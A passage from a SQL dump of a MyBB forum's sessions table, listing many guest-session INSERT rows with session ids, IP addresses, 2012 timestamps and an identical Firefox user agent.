WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1587a48900b25a4d9004cb2e6b236c16', '0', '70.207.68.157', '1352772373', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d86678dc102f4de7bbc63fed52ff7edd', '0', '30.137.120.5', '1352772373', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f55a8945273dc7463fed28ffad40a75', '0', '3.113.52.196', '1352772374', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b66f01594623b3048d3aeac07fbfd06e', '0', '68.142.182.109', '1352772375', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d9b23801641e6b88bc6d6f48354dbe07', '0', '133.131.161.11', '1352772376', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bae54b5221c95c80dd9e9a28a53c7825', '0', '109.139.173.174', '1352772376', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a3bb3e948e00e113c9556960b48592e1', '0', '226.16.35.104', '1352772377', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fc9bf1fc7f082e672d8d7bbe694cf031', '0', '242.10.23.147', '1352772377', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dddb9db6245e9d49f6464eb75f60432c', '0', '189.2.127.59', '1352772378', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a4672124d35d1b6d70b0cb4446e3282', '0', '210.64.220.2', '1352772379', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d8d85a02d8eb2a2642ec1d6bbb6b25da', '0', '54.83.49.103', '1352772380', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e7f48992fd9b4fd7a7a776242640db31', '0', '32.116.237.15', '1352772380', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b027f1e569fb314fa51870eb01d0631e', '0', '223.134.81.247', '1352772381', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a30123a05d1f4f1c90c8cd7196a58f00', '0', '71.216.54.106', '1352772381', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9019599d32428f76f722bf178eaba305', '0', '200.101.252.97', '1352772382', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bfec304034292426730badf055676274', '0', '80.227.34.203', '1352772383', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('56883ee98b84fc412d6601bac43baf67', '0', '112.130.243.225', '1352772383', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('365541c009042c7120592ce92ec1256a', '0', '13.174.72.36', '1352772384', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bce4947e2d792f9ed5bad61d6fe65792', '0', '38.133.13.214', '1352772385', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('72419608509f361b26e45c30685987c1', '0', '62.164.212.112', '1352772386', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f1c5ba2fce2e6e50693f8c58d2ccd94', '0', '109.149.29.195', '1352772387', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2927da9cee79ae9653fb9653d419991', '0', '216.90.130.138', '1352772388', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('001bcc57abf156f4851c0e4c00b03d01', '0', '229.59.186.171', '1352772389', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9315d4f44a5a5584c2cbf78c24578b42', '0', '106.124.67.219', '1352772389', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ed7ecca0379b006b592058a267a3180', '0', '80.96.144.221', '1352772390', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a32ff92e6eda471104eeae4191737a81', '0', '103.159.37.33', '1352772391', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8928681a559b0e5b8d575a2ba9fd2df4', '0', '104.10.74.179', '1352772391', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e89fd5105e89eb297141818a44f95967', '0', '33.249.131.39', '1352772392', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0395c6e945aa5d43cbbc59003d68c48', '0', '234.42.243.127', '1352772393', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('139ac362086798df3a9d0b38b2689987', '0', '254.228.57.172', '1352772394', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c6221bafb394f80b157b03fa5fbe1888', '0', '16.245.168.140', '1352772395', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d337d25b9eabe707b969aae30f6f38da', '0', '52.206.200.192', '1352772395', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('45f12ab830f1daf9a96296f3bd1d9097', '0', '48.82.206.110', '1352772396', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('490cb1ead648c0d7c5fa59d41413836e', '0', '19.121.241.1', '1352772397', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('81a90e374f0bb06a6e003da443e196ec', '0', '194.79.200.142', '1352772398', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1f95da00289fdc4c1c74196ac13e4bdc', '0', '147.228.230.239', '1352772398', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fd4dfee587153545c04f864cfe299369', '0', '130.244.162.175', '1352772399', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1953907ce79fcc6c4dcc754e7011b5a', '0', '35.222.20.132', '1352772400', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('457cadab05d31b90fe305f1d29bedfdb', '0', '64.244.2.190', '1352772400', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e718178d8d6402cf12b2ea2b97678511', '0', '194.32.231.5', '1352772401', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('84a07b94ae241ae2353260e24ed2e5a3', '0', '61.249.52.220', '1352772403', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4a1a2b446adf332ca736bfe7e75bc313', '0', '167.102.117.254', '1352772403', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('90ef7e5f1b470878b4c960e4d1882d86', '0', '220.235.197.68', '1352772403', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('555a464329a0f7b3a9c512d04fa0b30b', '0', '183.240.157.74', '1352772404', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1f6ba6e787cfe1750d903111feb44a23', '0', '247.176.5.105', '1352772405', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fa2ad68c0e7298d489014297bfb22082', '0', '47.104.158.47', '1352772406', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f9d1667dd78d822bb791f30f11853aed', '0', '35.48.52.203', '1352772406', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0fe41073d005d1b63cb55ad4af441fe4', '0', '184.60.125.17', '1352772407', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f416d29135c20bc594e7340dc9ce639', '0', '218.174.13.137', '1352772408', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e5f55afeadcb4ea48c057b13a228c028', '0', '218.237.209.141', '1352772409', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c7c104b72932e374f10ee7881e5ecad9', '0', '250.211.112.92', '1352772412', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ca82348a5a5dd4716062bd9f7efa00e', '0', '107.215.28.141', '1352772413', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fdb299bda7a2ff329e1c587953c14159', '0', '223.23.234.170', '1352772414', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('89cd90abf8b0c61eb13fdacdf6a5b377', '0', '210.209.40.2', '1352772415', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('be2155c7b1d51f7d59f7d0079bd9af14', '0', '86.238.107.220', '1352772415', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a597291f38cab49b829656655f5e778e', '0', '149.82.221.114', '1352772416', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8d7440929987c1bc922c06f6e344b0ed', '0', '75.96.181.19', '1352772416', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f183769e5f9406b17231fe2c6591cb80', '0', '99.56.37.74', '1352772417', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9bbfb3c1156f59fff3493e7c635cd3d8', '0', '241.229.172.29', '1352772418', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7926e0a1a1774808035d0a390914bec0', '0', '65.124.16.88', '1352772418', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('50c3f970d8f07df4bfdc58b1595f99d1', '0', '94.98.110.95', '1352772419', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('298321348900972804bd0545075adcaf', '0', '59.87.153.138', '1352772420', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8952fe5b6d0a43cc7edb9e21eefe4a13', '0', '70.39.88.243', '1352772420', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14a49ef6aa5347d62162f15afd91e393', '0', '206.220.132.222', '1352772421', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f390f3062ad4c9ce4636a85a50e93b1a', '0', '213.50.182.62', '1352772422', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f240e4b29b5a18253523f03289814d32', '0', '85.180.105.99', '1352772423', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1071127f90ca280ce244ac275ab55ace', '0', '109.139.114.111', '1352772424', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b9e3afec92c7a923ea2006c8f2cfa9f3', '0', '81.10.137.182', '1352772425', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f0a6e872727c97567cb9d1b53064916', '0', '217.171.126.144', '1352772426', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6a5b70647810b6cdceaf185a7b1ab2b', '0', '58.16.9.34', '1352772427', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4bba39459eb4a10638b0457a6d4fdd93', '0', '143.51.23.214', '1352772427', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f37ec4b83a640a0b9d6422485b952a9', '0', '178.140.31.236', '1352772638', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd617d365c84d9bfd7385810a44f84c4', '0', '194.208.176.62', '1352772428', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('128ff93fba1bae74b2e8b4ce0e46ebe9', '0', '247.35.182.45', '1352772428', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ee9bde38b016c41c0c95638adeffab38', '0', '53.249.161.149', '1352772429', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb29616806254a499754f981e8d95866', '0', '200.37.114.192', '1352772430', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0430f64b696fc8b11a28a365a9ba64fa', '0', '245.197.33.43', '1352772431', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3695b5877dedfe54dfa8ae6b016e810f', '0', '237.231.134.12', '1352772432', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d05289ac90d3ab909a35bb6620a26ed3', '0', '143.24.166.237', '1352772432', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, 